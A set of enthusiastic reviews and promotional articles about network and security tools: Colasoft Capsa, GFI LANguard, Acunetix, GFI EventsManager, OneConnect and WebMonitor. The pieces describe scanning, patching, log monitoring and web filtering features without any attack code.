The Packet tab gives access to the packets captured on the network. The user is able to lock the automatic scrolling or release it so new packets are shown as they are captured or have the program continue capturing packets without scrolling the packet window. This allows ease of access to any older packet without the need to scroll back for every new packet captured.

Even though the refresh time is customisable, the fastest refresh rate was only every 1 second. We would prefer a 'realtime' refresh rate and hope to see this implemented in the next update.

reviews-colasoft-18

Log Tab

The Log tab offers information on sessions related to specific protocols such as DNS, Email, FTP and HTTP. It's a good option to have, but we found little value in it since all other features of the program fully cover the information provided by the Log tab.

reviews-colasoft-19

 

Report Tab

The report tab is yet another useful feature of Colasoft's Capsa. It will allow the generation of a network report with all the captured packets and can be customised to a good extent. The program allows the engineer to insert a company logo and name, plus customise a few more fields.

The options provided in the report are quite a few, the most important being the Diagnosis and Protocol statistics.

reviews-colasoft-20

Finally, the report can be exported to PDF or HTML format to distribute it accordingly.

Professionals can use this report to provide evidence of their findings to their customers, making the job look more professional and saving hours of work.

Online Resource

The 'Online Resource' section is a great resource to help the engineer get the most out of the program. It contains links and live demos that show how to detect ARP poisoning attacks, ARP Flooding, how to monitor network traffic efficiently, track down BitTorrents and much more.

Once the user becomes familiar with the software they can select to close this section, giving its space to the rest of the program.

Final Conclusion

Colasoft's Capsa Network Analyser is without doubt a goldmine. It offers numerous enhancements that make it pleasant to work with and easy for anyone to find the information they need. Its unique functions such as the Diagnosis, Matrix and Reports surely make it stand out and can be invaluable for anyone troubleshooting network errors.

While the program is outstanding, it can do with some minor enhancements such as the real-time presentation of packets, more thorough network reports and improvement of the traffic history chart. Future updates will also need to include a 10Gbit option amongst the available network profies.

We would definitely advise any network administrator or engineer to give it a try and see for themselves how great a tool like Capsa can be.

  • Hits: 25108

GFI Languard Network Security Scanner V8

Can something really good get better? That was the question that faced us when we were assigned to review GFI's Languard Network Security Scanner, Version 8 , already well loved (and glowingly reviewed) at Version 5.

All vulnerability scanners for Windows environments fulfil the same basic function, but as the old saying goes “It's not what you do; it's the way that you do it”. GFI have kept all the good points from their previous releases and built on them; and the result is a tool that does everything you would want with an excellent user interface that is both task efficient and a real pleasure to use.

Installation

Visit GFI's website and you can download a fully-functional version that you can try before you buy; for ten days if you prefer to remain anonymous or for thirty days if you swap your details for an evaluation code. The download is 32Mb expanding to 125Mb on your disk when installed.

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

First of all, if you have a license key you can enter it during installation to save time later – just a little thing, but it shows this software has been designed in a very logical manner.

You're then asked for an account to run the Attendant service, the first of the Version 8 enhancements. This, as its name suggests, is a Windows service that sits in your system tray and allows you easy access to the program and its documentation plus a handy window that lets you see everything the scanner is doing as it works away in the background.

reviews-gfi-languard-v8-1

After this you're asked whether you'd like your scan results stored in Microsoft Access or SQL Server (2000 or higher). This is another nice feature, particularly if you're using the tool to audit, patch and secure an entire infrastructure.

One feature we really liked is the ability to run unattended scheduled scans and email the results. This is a feature you won't find in any other similar product.

GFI's LANguard scanner doesn't just find vulnerabilities, it will also download the updates that fix them and patch your machines for you.

Finally, you can tell the software where to install itself and sit back while the installation completes.

Getting Started

Each time you start the scanner it checks with GFI for more recent versions and for updated vulnerabilities and patches. You can turn this off if you don't always have internet access.

You'll also get a wizard to walk you through the most common scanning tasks. This is great for new users and again you can turn it off once you become familiar with the product.

reviews-gfi-languard-v8-2

The Interface

Everything takes place in one uncluttered main screen as shown below. As our first review task we closed the wizard and simply ‘had a go' without having read a single line of documentation. It's a testament to the good design of the interface that within a few mouse clicks we were scanning our first test system without any problems.

reviews-gfi-languard-v8-3

The left hand pane contains the tools, menus and options available to you. This is split over three tabs, an improvement over Version 5 where everything sat in one huge list. To the right of this are two panes that display the information or settings relating to the option you've chosen, and the results the product has obtained. Below them is a results pane that shows what the scanner is up to, tabbed again to let you view the three scanner threads or the overall network discovery.

Performance and Results

It's fast. While performance obviously depends on your system and network we were pleasantly surprised by the efficiency and speed of the scan.

Speed is nothing however without results, and the product doesn't disappoint. Results are logically presented as an expanding tree beneath an entry for each scanned machine. Select one of the areas in the left pane and you'll get the detail in the right pane. Right-click there and you can take appropriate action; in the example shown right-clicking will attempt a connection on that port:

reviews-gfi-languard-v8-4

Vulnerabilities are similarly presented with rich and helpful descriptions, while references for further information from Microsoft and others plus the ability to deploy the relevant patches are just a right-click away:

reviews-gfi-languard-v8-5

The scanner is also surprisingly resilient. We decided to be mean and ran a scan of a desktop PC on a large network – via a VPN tunnel within a VPN tunnel across the public internet with an 11Mb/s wireless LAN connection on the other end. The scan took about ten minutes but completed fine.

Patch Deployment

Finding vulnerabilities is only half the story; this product will also help you fix them. One click at the machine level of the scan results opens yet another helpful screen that gathers all your options in one place. You can elect to remotely patch the errant machine, shut it down or even berate the operator, and a particularly nice touch is the list of your top five most pressing problems:

reviews-gfi-languard-v8-6

Patch deployment is similarly intuitive. The product can download the required patches for you, either now or at a scheduled time, and can access files already downloaded by a WSUS server if you have one. Once you have the files available you can patch now or schedule the deployment, and either way installation is automatic.

Alongside this is another Version 8 feature which gives you access to the same mechanism to deploy and install software of your choice. We tested this by push-installing some freeware tools, but all you need is a fully scripted install for unattended installation and you can deploy anything you like out to your remote machines. This is where the Attendant Service comes in again as the tray application provides a neat log of what's scheduled and what's happened. The example shows how good the error reporting is (we deliberately supplied the wrong credentials):

reviews-gfi-languard-v8-7

This powerful feature is also remarkably configurable –you can specify where the copied files should go, check the OS before installation, change the user credentials (important for file system access and for push-installing the Patch Agent service), reboot afterwards or even seek user approval before going ahead. We've used other tools before for software deployment and we felt right at home with the facilities here.

Scripting and Tools

Another plus for the busy administrator is the facility to schedule scans to run when you'd rather be away doing something else. You can schedule a simple timed scan and have the results emailed to you, or you can set up repeating scans and have the product compare the current results with the previous and only alert you if something has changed. If you don't want your inbox battered you can sleep soundly knowing you can still consult the database next morning to review the results. And if you have mobile users your group scan (or patch) jobs can stay active until your last elusive road warrior has appeared on the network and been processed. Resistance is futile!

Under the Tools tab there are a few more goodies including an SNMP audit to find insecure community strings. This was the site of our only disappointment with the product – we would have liked the ability to write our own tools and add them in here, but it seemed we'd finally found something GFI hadn't thought of.

reviews-gfi-languard-v8-8

Having said that, all the other scripting and tweaking facilities you'd expect are there, including a comprehensive command-line interface for both scanning and patch deployment and the ability to write custom vulnerability definitions in VBScript. All this and more is adequately documented in the well-written on-line help and user manual, and if you're still stuck there's a link to GFI's knowledgebase from within the program itself.

Summary

We were really impressed by this product. GFI have done an excellent job here and produced a great tool, which combines vulnerability scanning and patch management , with heavyweight features and an excellent user interface that is a joy to work with.

  • Hits: 20516

Acunetix Web Vulnerability Scanner

The biggest problem with testing web applications is scalability. With the addition of even a single form or page to test, you invariably increase the number of repetitive tasks you have to perform and the number of relationships you have to analyze to figure out whether you can identify a security issue.

As such, performing a security assessment without automation is an exercise in stupidity. One can use the lofty argument of the individual skill of the tester, and this is not to be discounted – I’ll come back to it – but, essentially, you can automate at least 80% of the task of assessing website security. This is part of the reason that security testing is becoming highly commoditized, the more you have to scan, the more repetitive tasks you have to perform. It is virtually impossible for a tester to manually analyze each and every single variable that needs to be tested. Even if it were so, to perform this iterative assessment manually would be foolishly time-consuming.

This problem, coupled with the explosive growth of web applications for business critical applications, has resulted in a large array of web application security testing products. How do you choose a product that is accurate (false positives are a key concern), safe (we’re testing important apps), fast (we come back the complexity point) and perhaps most importantly, meaningful in its analysis?

This implies that its description of the vulnerabilities discovered, and the measures to be taken to mitigate them, must be crystal clear. This is essentially what you’re paying for, it doesn’t matter how good the scanning engine is or how detailed their threat database is if the output – risk description and mitigation – are not properly handled. With these points in mind, we at Firewallcx, decided to take Acunetix’s Web Vulnerability Scanner for a spin.

I’ve had the pleasure of watching the evolution of web scanning tools, right from my own early scripting in PERL, to the days of Nikto and libwhisker, to application proxies, protocol fuzzers and the like. At the outset, let me say that Acunetix’s product has been built by people who have understood this evolution. The designers of the product have been around the block and know exactly what a professional security tester needs in a tool like this. While this puppy will do point ’n’ shoot scanning with a wizard for newbies, it has all the little things that make it a perfect assistant to the manual tester.

A simple example of ‘the small stuff’ is the extremely handy encoder tool that can handle text conversions and hashing in a jiffy. Anyone who’s had the displeasure of having to whip up a base-64 decoder or resort to md5sum to obtain a hash in the middle of a test will appreciate why this is so useful. More importantly, it shows that the folks at Acunetix know that a good tester will be analyzing the results and tweaking the inputs away from what the scanning engine would do. Essentially they give you the leeway to plug your own intellect into the tool.

Usage is extremely straightforward, hit the icon and you’ll get a quick loading interface that looks professional and displays information smartly (I appreciate the tabbed interfaces, these things matter as a badly designed UI could overwhelm you with more information than you need). Here’s a shot of the target selection wizard:

reviews-acunetix-1

What I liked here was the ‘Optimize for the following technologies’ setup. Acunetix did a quick query of my target (our website, www.Firewall.cx) and identified PHP, mod_ssl, OpenSSL and FrontPage as modules that we’re using. When you’re going up against a blind target in a penetration test or setting up scans for 50 webapps at a time, this is something that you will really appreciate.

Next we come to the profile selection – which allows you to choose the scanning profile. Say I just want to look for SQL injection, I can pick that profile. You can use the profile editor to customize and choose your own checks. Standard stuff here. The profile and threat selection GUI is well categorized and it’s easy to find the checks you want to deselect or select.

reviews-acunetix-2

You can browse the threat database in detail as shown below:

reviews-acunetix-3

At around this juncture, the tool identified that www.Firewall.cx uses non-standard (non-404) error pages. This is extremely important for the tool to do. If it cannot determine the correct ‘page not found’ page, it will start throwing false positives on every single 302 redirect. This is a major problem with scanners such as Nikto and is not to be overlooked. Acunetix walked me through the identification of a valid 404 page. Perhaps a slightly more detailed explanation as to why this is important would benefit a newbie.

I had updated the tool before scanning, and saw the threat database being updated with some recent threats. I don’t know the threat update frequency, but the process was straightforward and, unlike many tools, didn’t require me to restart the tool with the new DB.

reviews-acunetix-4

Since I was more interested in the ‘how can I help myself’ as opposed to ‘how can you help me’ approach to scanning, I fiddled with the fuzzer, request generator and authentication tester. These are very robust implementations, we have fully fledged tools implementing just this functionality and you should not be surprised to see more people discarding other tools and using Acunetix as a one-stop-shop toolbox.

One note though, the usernames dictionary for the authentication tester is far too limited out of the box (3-4 usernames), the password list was reasonably large, but the tool should include a default username list (where are things like ‘tomcat’, ‘frontpage’ etc?) so as not to give people a false sense of security. Given that weak password authentication is still one of the top reasons for a security breach, this module could use a reworking. I would like to see something more tweakable, along the lines of Brutus or Hydra’s HTTP authentication capabilities. Perhaps the ability to plug in a third party bruteforce tool would be nice.

Here I am playing with the HTTP editor:

reviews-acunetix-5

Here’s the neat little encoder utility that I was talking about earlier. You will not miss this one in the middle of a detailed test:

reviews-acunetix-6

After being satisfied that this product could get me through the manual phase of my audits, I fell back on my tester’s laziness and hit the scan button while sipping a Red Bull.

The results arrive in real time and are browseable, which is far better than seeing a progress bar creep forward arbitrarily. While this may seem cosmetic, when you’re being pushed to deliver a report, you want to be able to keep testing manually in parallel. I was watching the results come in and using the HTTP editor to replicate the responses and judge what required my manual intervention.

Essentially, Acunetix chews through the application looking for potential flaws and lets you take over to verify them in parallel. This is absolutely the right approach and far more expensive tools that I’ve used do not realise this. Nobody with half smarts will rely purely on the output of a tool, a thorough audit will have the tester investigating concern areas on his own, if I have to wait for your tool to finish everything it does before I can even see those half-results, you’ve wasted my time.

Here’s how the scanning window looked:

reviews-acunetix-7

Now bear in mind that I was running this test over a 256kbps link on the Internet, I was expecting it to take time, especially given that Firewall.cx has an extremely large set of pages. Halfway through, I had to stop the test as it was bravely taking on the task of analyzing every single page in our forums. However, there was constant feedback through the activity window and my network interface, you don’t end up wondering whether the product has hung as is the case with many other products I’ve used.

The reporting features are pretty granular, allowing you to select the usual executive summary and detailed report options. Frankly, I like the way the results are presented and in the course of my audits never needed to generate a report from the tool itself. I’m certain that the features of the reporting module will more than suffice. The descriptions of the vulnerabilities are well written, the solutions are accurate and the links to more information come from authoritative sources. If you come back to what I said in the opening stages of this review, this is the most important information that a tool should look to provide. Nothing is more terrible than ambiguous results, and that is a problem you will not have with this product.

One drawback found with the product was the lack of a more complete scripting interface. Many testers would like the ability to add their own code to the scanning setup. I did check out the vulnerability editor feature, but would prefer something that gave me more flexibility. Another was the lack of a version for Linux / UNIX-like systems. The majority of security testers operate from these platforms and it would be nice not to have to switch to a virtual machine or deal with a dual boot configuration to be able to harness the power of this tool. Neither of these drawbacks are deal killers, and should be treated more as feature requests.

Other than that, I truly enjoyed using this product. Web application auditing can be a tedious and time consuming nightmare, and the best praise I can give Acunetix is that they’ve made a product that makes me feel a part of the test. The interactivity and levels of detail available to you give you the ability to be laid back or tinker with everything you want, while the test is still going on. With its features and reasonable pricing for a consultant’s license, this product is unmatched and will quickly become one of the premier tools in your arsenal.

  • Hits: 24035

GFI LANguard Network Security Scanner Version 5.0 Review

In the light of all the recent attacks that tend to focus on the vulnerabilities of Windows platforms, we were increasingly dissatisfied with the common vulnerability scanners that we usually employ. We wanted a tool that didn't just help find holes, but would help administer the systems, deploy patches, view account / password policies etc. In short, we were looking for a Windows specialist tool.

Sure, there's a number of very popular (and very expensive) commercial scanners out there. However, most of them are prohibitively priced for the networks we administrate and all of them fell short on the administrative front. We tested a previous version of LANguard and our initial impressions were good. Thus we decided to give their latest offering a spin.

Getting Started

Getting the tool was easy enough, a quick visit to GFI's intuitively laid out site, and a 10MB download later, we were set to go. We must mention that we're partial to tools that aren't too heavy on the disk-space. Sahir has started carrying around a toolkit on his cell-phone USB drive, where space is at a premium. 10MB is a reasonable size for a program with all the features of this one.

Installation was the usual Windows deal (Click <next> and see how quickly you can reach <finish>). We fired up the tool and was greeted with a splash screen that checked for a newer version, and downloaded new patch detection files, dictionaries, etc.

reviews-gfi-languard-1

We'd prefer to have the option of updating rather than having it happen every time at startup bu we couldn't find the option to change this behaviour; this is a minor point that GFI should add.

Interface

Once the program is fully updated, you're greeted with a slick interface that looks like it's been made in .Net. No low coloured icons and cluttered toolbars here. While some may consider this inconsequential, it's a pleasure to work on software that looks good. It gives it that final bit of polish that's needed for a professional package. You can see the main screen below.

reviews-gfi-languard-2

The left panel shows all the tools available and is like an ‘actions' pane. From here you can select the security scanner, filter your scan results in a variety of ways, access the tools (such as patch deployment, DNS lookup, traceroute, SNMP audit, SQL server audit etc) and the program configuration as well. In fact if you look under the menus at the top, you'll find very few options as just about everything can be controlled or modified from the left panel.

The right panel obviously shows you the results of the scan, or the tool / configuration section you have selected. In this case it's on the Security Scanner mode where we can quickly setup a target and scan it with a profile. A profile is a description of what you want to scan for, the built in profiles include:

  • Missing patches
  • CGI scanning
  • Only Web / Only SNMP
  • Ping them all
  • Share Finder
  • Trojan Ports
  • Full TCP & UDP port scan

In the Darkness, Scan ‘em...

We setup the default scanning profile and scanned our localhost (a mercilessly locked down XP box that resists spirited break-ins from our practice penetration tests). We scanned as the ‘currently logged on user' (an administrator account), which makes a difference, since you see a lot more when scanning with privileges than without. As we had expected, this box was fairly well locked down. Here is the view just after the scan finished:

reviews-gfi-languard-3

Clicking one of the filters in the left pane brings up a very nicely formatted report, showing you the information you requested (high vulnerabilities, low vulnerabilities, missing patches etc). Here is the full report:

reviews-gfi-languard-4

As you can see, it identified three open ports (no filtering was in place on the loopback interface) as well as MAC address, TTL, operating system etc.

We were not expecting much to show up on this highly-secured system, so we decided to wander further.

The Stakes Get Higher...

Target 2 is the ‘nightmare machine'. It is a box so insecure that it can only be run under VMWare with no connection to the Internet. What better place to set LANguard free than on a Windows XP box, completely unpatched, completely open? If it were setup on the ‘net it would go down within a couple of minutes!

However, this was not good enough for our rigorous requirements, so we infected the box with a healthy dose of Sasser. Hopefully we would be able to finish the scan before LSASS.exe crashed, taking the system down with it. To make life even more difficult, we didn't give LANguard the right credentials like we had before. In essence, this was a 'no privilege' scan.

reviews-gfi-languard-5

LANguard detected the no password administrator account, the Sasser backdoor, default sharing, Terminal Services active (we enabled it for the scenario). In short, it picked up on everything.

We purposely didn't give it any credentials as we wanted to test its patch deployment features last, since this was what we were really interested in. This was very impressive as more expensive scanners (notably Retina) missed out on a lot of things when given no credentials.

To further extend out scans, we though it would be a good idea to scan our VLAN network that contained over 250 Cisco IP Phones and two Cisco Call Managers. LANguard was able to scan all IP Phones without a problem and also gave us some interesting findings as shown in this screenshot:

reviews-gfi-languard-6

LANguard detected with ease the http port (80) open and also included a sample of the actual page that would be downloaded should a client connect to the target host!

It is quite important to note at this point that the scan shown above was performed without any disruptions to our Cisco VoIP network. Even though no vulnerabilities were detected, something we expected, we were pleased enough to see Languard capable of working in our Cisco VoIP network without problems.

If you can't join them …... Patch them!

Perhaps one of the most neatest features of GFI's LANguard is the patch management system, designed to automatically patch the systems you have previously scanned. The automatic patching system works quite well, but you should download the online PDF file that contains instructions on how to proceed should you decide to use this feature.

The automatic patching requires the host to be previously scanned in order to find all missing patches, service packs and other vulnerabilities. Once this phase is complete, you're ready to select the workstation(s) you would like to patch!

As expected, you need the appropriate credentials in order to successfully apply all selected patches, and for this reason there is a small field in which you can enter your credentials for the remote machine.

We started by selectively scanning two hosts in order to proceed patching one of them. The target host was 10.0.0.54, a Windows 2000 workstation that was missing a few patches:

reviews-gfi-languard-7

LANguard successfully detected the missing patches on the system as shown on the screenshot above, and we then proceeded to patch the system. A very useful feature is the ability to select the patch(es) you wish to install on the target machine.

reviews-gfi-languard-8

As suggested by LANguard, we downloaded the selected patch and pointed our program to install it on the remote machine. The screen shot above shows the patch we wanted to install, followed by the machine on which we selected to install it. At the top of the screen we needed to supply the appropriate credentials to allow LANguard to do its job, that is, a username of 'Administrator' and a password of ..... sorry - can't tell :)

Because most patches require a system reboot, LANguard includes such options, ensuring that no input at all is required on the other side for the patching to complete. Advanced options such as ‘Warn user before deployment' and ‘Delete copied files from remote computer after deployment', are there to help cover all your needs:

reviews-gfi-languard-9

The deployment status tab is another smart feature; it allows the administrator to view the patching in progress. It clearly shows all steps taken to deploy the patch and will report any errors encountered.

It is also worth noting that we tried making life more difficult by running the patch management system from our laptop, which was connected to the remote network via the Internet, and securing it using a Cisco VPN tunnel with the IPSec as the encryption protocol. Our expectations were that GFI's LANguard would fail terribly, giving us the green light to note a weak point of the program.

To our surprise, it seems like GFI's developers had already forseen such situations and the results were simply amazing, allowing us to successfully scan and patch a Windows 2000 workstation located on the end of the VPN tunnel!

Summary

GFI without doubt has created a product that most administrators and network engineers would swear by. It's efficient, fast and very stable, able to perform its job whether you're working on the local or remote LAN.

Its features are very helpful: you won't find many network scanners pointing you to web pages where you can find out all the information on discovered vulnerabilities, download the appropriate patches and apply them with a few simple clicks of a mouse!

We've tried LANguard from small networks with 5 to 10 hosts up to large corporate network with more than 380 hosts, over WAN links and Cisco VPN tunnels and it worked like a charm without creating problems such as network congestions. We are confident that you'll love this product's features and it will quickly become one of your most necessary programs.

  • Hits: 21435

GFI EventsManager 7 Review

Imagine having to trawl dutifully through the event logs of twenty or thirty servers every morning, trying to spot those few significant events that could mean real trouble among that avalanche of operational trivia. Now imagine being able to call up all those events from all your servers in a single browser window and, with one click, open an event category to display just those events you are interested in…

Sounds good? Install this product, and you’ve got it.

A product of the well-known GFI stables, EventsManager 7 replaces their earlier LANguard Security Event Log Monitor (S.E.L.M.) which is no longer available. There’s also a Reporting Suite to go with it; but we haven’t reviewed that here.

In a nutshell the product enables you to collect and archive event logs across your organisation, but there’s so much more to it than that. It’s hard to condense the possibilities into a review of this size, but what you actually get is:

  • Automatic, scheduled collection of event logs across the network; not only from Windows machines but from Linux/Unix servers too, and even from any network kit that can generate syslog output;
  • The ability to group your monitored machines into categories and to apply different logging criteria to each group;
  • One tool for looking at event logs everywhere. No more switching the event log viewer between servers and messing around with custom MMCs;
  • The ability to display events by category or interest type regardless of where they occurred (for example just the Active Directory replication events, just the system health events, just the successful log-on events outside normal working hours);
  • Automated response actions for particular events or types of events including alerting staff by email or pager or running an external script to deal with the problem;
  • A back-end database into which you can archive raw or filtered events and which you can search or analyse against – great for legal compliance and for forensic investigation.

You can download the software from GFI’s website and, in exchange for your details, they’ll give you a thirty-day evaluation key that unlocks all the features; plenty of time to decide if it’s right for you. This is useful, because you do need to think about the deployment.

One key issue is the use of SQL-Server as the database back-end. If you have an existing installation you can use that if capacity permits, or you could download SQL Server Express from Microsoft. GFI do tell you about this but it’s hidden away in Appendix 3 of the manual, and an early section giving deployment examples might have been useful.

That said, once you get installed a handy wizard pops up to lead you through the key things you need to set up:

reviews-eventsmanager-1

Here again are things you’ll need to think about – such as who will get alerted, how, when and for what, and what actions need to be taken.

You’ll also need to give EventsManager a user that has administrative access to the machines you want to monitor and perhaps the safest way to do this is to set up a new user dedicated to that purpose.

Once you’ve worked through the wizard you can add your monitored machines under the various categories previously mentioned. Ready-made categories allow you to monitor according to the type, function or importance of the target machine and if you don’t like those you can edit them or create your own.

reviews-eventsmanager-2

The categories are more than just cosmetic; each one can be set up to define how aggressively EventsManager monitors the machines, their ‘working week’, (useful for catching unauthorised out-of-hours activity) and the types of events you’re interested in (you might not want Security logs from your workstations, for example). Encouragingly though, the defaults provided are completely sensible and can be used without worry.

reviews-eventsmanager-3

Once your targets are defined you’ll begin seeing logs in the Events Browser, and this is where the product really scores. To the left of the browser is a wealth of well-thought-out categories and types; click on one of these and you’ll see those events from across your enterprise. It’s as simple, and as wonderful as that.

reviews-eventsmanager-4

You can click on the higher-level categories to view, for example, all the SQL Server events, or you can expand that out and view the events by subcategory (just the Failed SQL Server Logons for example).

Again, if there are events of particular significance in your environment you can edit the categories to include them or even create your own, right down to the specifics of the event IDs and event types they collect. A particularly nice category is ‘Noise’, which you can use to collect all that day-to-day operational verbiage and keep it out of the way

For maximum benefit you’ll also want to assign actions to key categories or events. These can be real-time alerts, emails, corrective action scripts and log archiving. And again, you guessed it, this is fully customisable. The ability to run external scripts is particularly nice as with a bit of tweaking you can make the product do anything you like.

reviews-eventsmanager-5

Customisation is one of the real keys to this product. Install it out of the box, just as it comes, and you’ll find it useful. But invest some time in tailoring it to suit your organisation and you’ll increase its value so much you’ll wonder how you ever managed without it.

In operation the product proved stable though perhaps a little on the slow side when switching between screens and particularly when starting up. This is a testimony to the fact that the product is doing a lot of work on your behalf and, to get the best from it, you really should give it a decent system to run on. The benefits you’ll gain will more than make up for the investment.

  • Hits: 18165

GFI OneConnect – Stop Ransomware, Malware, Viruses, and Email hacks Before They Reach Your Exchange Server

gfi-oneconnect-ransomware-malware-virus-datacenter-protection-1aGFI Software has just revealed GFI OneConnect Beta – its latest Advanced Email Security Protection product. GFI OneConnect is a comprehensive solution that targets the safe and continuous delivery of business emails to organizations around the world.

GFI has leveraged its years of experience with its millions of business users around the globe to create a unique Hybrid solution consisting of an on-premise server and Cloud-based solution that helps IT admins and organizations protect their infrastructure from spam, malware threats, ransomware, virus and email service outages.  

GFI OneConnect not only takes care of filtering all incoming email for your Exchange server but it also works as a backup service in case your Exchange server or cluster is offline.

The solution consists of the GFI OneConnect Server that is installed on the customer’s premises. The OneConnect server connects to the local Exchange server on one side, and the GFI OneConnect Data Center on the other side as shown in the diagram below:

Deployment model of GFI OneConnect (Server & Data Center)

Figure 1. Deployment model of GFI OneConnect (Server & Data Center)

Email sent to the organization’s domain is routed initially through the GFI OneConnect . During this phase email is scanned by the two AntiVirus engines (ClamAV & Kaspersky) for virus, ransomware, malware etc. before forwarding them to the Exchange Server.

In case the Exchange server is offline GFI OneConnect’s Continuity mode will send and receive all emails, until the Exchange server is back online after which all emails are automatically synchronised. All emails received while your email server was down are available to users at any moment, thanks to the connection to the cloud and the GFI OneConnect’s Datacenter.

Deployment model of GFI OneConnect (Server & Data Center)

Figure 2. GFI OneConnect Admin Dashboard (click to enlarge)

While there is currently a beta version out - our first impressions show that this is an extremely promising solution that has been carefully designed with the customer and IT staff in mind. According to GFI – the best is yet to come – and we know that GFI always stands by its promises so we are really looking forward seeing the final version of this product in early 2017.

If you’ve been experiencing issues with your Exchange server continuity or have problems dealing with massive amounts of spam emails, ransomware and other security threats – give GFI OneConnectBeta a test run and discover how it can help offload all these problems permanently, leaving you time for other more important tasks.

  • Hits: 9257

Enforcing ICT Policies - How to Block Illegal & Unwanted Websites from your Users and Guests

Enforcing ICT Policies - How to Block Illegal & Unwanted Websites for your Users and GuestsEnsuring users follow company policies when accessing the internet has become a real challenge for businesses and IT staff. The legal implications for businesses not taking measures to enforce acceptable user policies (where possible) can become very complicated and businesses can, in fact, be held liable for damages caused by their users or guests.

A good example, found in almost every business around the world, is the offering of guest internet access to visitors. While they are usually unaware of the company’s ICT policies (nor do they really care about them) they are provided with free unrestricted access to the internet.

Sure, the firewall will only allow DNS, HTTP and HTTPS traffic in an attempt to limit internet access and its abuse but who’s ensuring they are not accessing illegal sites/content such as pornography, gambling, etc., which are in direct violation of the ICT policy?

This is where solutions like GFI WebMonitor help businesses cover this sensitive area by quickly filtering website categories in a very simple and effective way that makes it easy for anyone to add or remove specific website categories or urls.

How To Block Legal Liability Sites

Enforcing your ICT Internet Usage Policy via WebMonitor is a very simple and fast process. From the WebMonitor web-based dashboard, click on Manage and select Policies:

Note: Click on any image to enlarge it and view it in high-resolution

Adding a new Policy in GFI WebMonitorFigure 1. Adding a new Policy in GFI WebMonitor

At the next screen, click on Add Policy:

Click on the GFI WebMonitor Add Policy buttonFigure 2. Click on the GFI WebMonitor Add Policy button

At the next screen add the desired Policy Name and brief description below:

Creating the Web Policy in GFI WebMonitor using the WEBSITE elementFigure 3. Creating the Web Policy in GFI WebMonitor using the WEBSITE element

Now click and drag the WEBSITES element (on the left) into the center of the screen as shown above.

Next, configure the policy to Block traffic matching the filters we are about to create and optionally enable temporary access from users if you wish:

Selecting Website Categories to be blocked and actions to be takenFigure 4. Selecting Website Categories to be blocked and actions to be taken

Under the Categories section click inside the Insert a Site Category field to reveal a drop-down list of the different categories. Select a category by clicking on it and then click on the ‘+’ symbol to add the category to this policy. Optionally you can click on the small square icon next to the ‘+’ symbol to get a pop-up window with all the categories.

Optionally select to enable full URL logging and then click on the Save button at the top right corner to save and enable the policy.

The new policy will now appear on the Policies dashboard:

enforce-ict-policies-block-illegal-and-unwanted-websites-5

Figure 5. Our new WebMonitor policy is now active

If for any reason you need to disable the policy all you need to do is click on the green power button on the left and the policy is disabled immediately. A very handy feature that allows administrators to take immediate action when they notice unwanted effects from the new policies.

After the policy was enabled we tried accessing a gambling website from one of our workstations and received the following message on our web browser:

Our new policy blocks users from accessing gambling sites

Figure 6. Our new policy blocks users from accessing gambling sites

The GFI WebMonitor Dashboard reporting Blocking/Warning hits on the company’s policies:

GFI WebMonitor reports our Internet usage ICT Policy is being hit

Figure 7. GFI WebMonitor reports our Internet usage ICT Policy is being hit (click for full dashboard image)

Summary

The importance of properly enforcing an ICT Internet Usage Policy cannot be underestimated. It can not only save the company from legal implications but also its users and guests from their very own actions. Solutions such as GFI WebMonitor are designed to help businesses effectively apply ICT Policies and control usage of high-risk resources such as the internet.

  • Hits: 12089

Minimise Internet Security Threats, Scan & Block Malicious Content, Application Visibility and Internet Usage Reporting for Businesses

gfi-webmonitor-internet-usage-reporting-block-malicious-content-1aFor every business, established or emerging, the Internet is an essential tool which has proved to be indispensable. The usefulness of the internet can be counteracted by abuse of it, by a business’s employees or guests. Activities such as downloading or sharing illegal content, visiting high risk websites and accessing malicious content are serious security risks for any business.

There is a very easy way of monitoring, managing and implementing effective Internet usage. GFI WebMonitor can not only provide the aforementioned, but also provide real – time web usage. This allows for tracking bandwidth utilisation and traffic patterns. All this information can then be presented on an interactive dashboard. It is also an effective management tool, providing a business with the internet usage records of its employees.

Such reports can be highly customised to provide usage information based on the following criteria/categories:

  • Most visited sites
  • Most commonly searched phrases
  • Where most bandwidth is being consumed
  • Web application visibility

Some of the sources for web abuse that can be a time sink for employees are social media and instant messaging (unless the business operates at a level where these things are deemed necessary). Such web sites can be blocked.

GFI WebMonitor can also achieve other protective layers for the business by providing the ability to scan and block malicious content. WebMonitor helps the business keep a close eye on its employees’ internet usage and browsing habits, and provides an additional layer of security.

On its main dashboard, as shown below, the different elements help in managing usage and traffic source and targets:

WebMonitor’s Dashboard provides in-depth internet usage and reporting

Figure 1. WebMonitor’s Dashboard provides in-depth internet usage and reporting

WebMonitor’s main dashboard contains a healthy amount of information allowing administrators and IT managers to obtain important information such as:

  • See how many Malicious Sites were blocked and how many infected files detected.
  • View the Top 5 Users by bandwidth
  • Obtain Bandwidth Trends such as Download/Upload, Throughput and Latency
  • Number of currently active web sessions.
  • Top 5 internet categories of sites visited by the users
  • Top 5 Web Applications used to access the internet

Knowing which applications are used to access the internet is very important to any business. Web applications like YouTube, Bittorrent, etc. can be clearly identified and blocked, providing IT managers and administrators a ringside view of web utilisation.

On the flip side, if a certain application or website is blocked and a user tries to access it, he/she will encounter an Access Denied page rendered by GFI WebMonitor. This notification should be enough for the user to be deterred from trying it again:

WebMonitor effectively blocks malicious websites while notifying users trying to access it

Figure 2. WebMonitor effectively blocks malicious websites while notifying users trying to access it

For the purpose of this article, a deliberate attempt was made to download an ISO file using Bittorent. As per the policy the download page was part of the block policy. Hence GFI WebMonitor not only blocked the user from accessing the file, it also displayed the violation stating the user’s machine IP Address and the policy that was violated. This is a clear demonstration of how the management of web application can be effective.

Some of the other great dashboards include bandwidth insight. The following image shows the total download and upload for a specific period. The projected values and peaks can be easily traced as well.

WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download trafficFigure 3. WebMonitor’s Bandwidth graphs help monitor the organisation’s upload/download traffic (click to enlarge)

Another useful dashboard is that of activity. This provides information about total users, their web request, and a projection of the next 30 days, as shown in the following image:

WebMonitor allows detailed tracking of current and projected user web requests with very high accuracyFigure 4. WebMonitor allows detailed tracking of current and projected user web requests with very high accuracy (click to enlarge)

The Security dashboard is perhaps one of the most important. This shows all the breaches based on category, type and top blocked web based applications that featured within certain policy violations.

